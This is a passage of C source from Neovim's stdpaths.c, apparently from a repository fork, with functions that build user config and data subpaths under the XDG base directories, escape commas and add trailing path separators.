FUNC_ATTR_WARN_UNUSED_RESULT FUNC_ATTR_NONNULL_ALL FUNC_ATTR_NONNULL_RET { return concat_fnames_realloc(get_xdg_home(kXDGConfigHome), fname, true); } /// Return subpath of $XDG_DATA_HOME /// /// @param[in] fname New component of the path. /// @param[in] trailing_pathseps Amount of trailing path separators to add. /// @param[in] escape_commas If true, all commas will be escaped. /// /// @return [allocated] `$XDG_DATA_HOME/nvim/{fname}`. char *stdpaths_user_data_subpath(const char *fname, const size_t trailing_pathseps, const bool escape_commas) FUNC_ATTR_WARN_UNUSED_RESULT FUNC_ATTR_NONNULL_ALL FUNC_ATTR_NONNULL_RET { char *ret = concat_fnames_realloc(get_xdg_home(kXDGDataHome), fname, true); const size_t len = strlen(ret); const size_t numcommas = (escape_commas ? memcnt(ret, ',', len) : 0); if (numcommas || trailing_pathseps) { ret = xrealloc(ret, len + trailing_pathseps + numcommas + 1); for (size_t i = 0 ; i < len + numcommas ; i++) { if (ret[i] == ',') { memmove(ret + i + 1, ret + i, len - i + numcommas); ret[i] = '\\'; i++; } } if (trailing_pathseps) { memset(ret + len + numcommas, PATHSEP, trailing_pathseps); } ret[len + trailing_pathseps + numcommas] = NUL; } return ret; }
C
5
BredeYabo/neovim
src/nvim/os/stdpaths.c
[ "Vim" ]